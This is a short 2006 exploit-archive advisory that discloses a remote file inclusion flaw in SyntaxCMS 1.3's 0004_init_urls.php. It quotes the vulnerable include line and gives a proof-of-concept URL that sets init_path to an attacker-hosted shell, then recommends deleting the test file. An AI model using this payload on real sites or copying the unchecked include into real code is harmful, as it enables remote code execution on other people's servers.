[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SyntaxCMS <= 1.3 (0004_init_urls.php) Remote File Include Vulnerability
# Published : 2006-09-24
# Author : MoHaJaLi
# Previous Title : iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection
# Next Title : exV2 <= 2.0.4.3 extract() Remote Command Execution Exploit


Remote File Include in syntaxCMS

Vulnerable File:
0004_init_urls.php

Vulnerable Code:

   1  <?php

   2  include_once( $init_path . '/init.urls.php' );

   3  ?>

PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&

Solution:

Remove This File...it's not needed...just used for tests

Found by MoHaJaLi

Greetz to Eddy_BAck0o

# www.Syue.com [2006-09-24]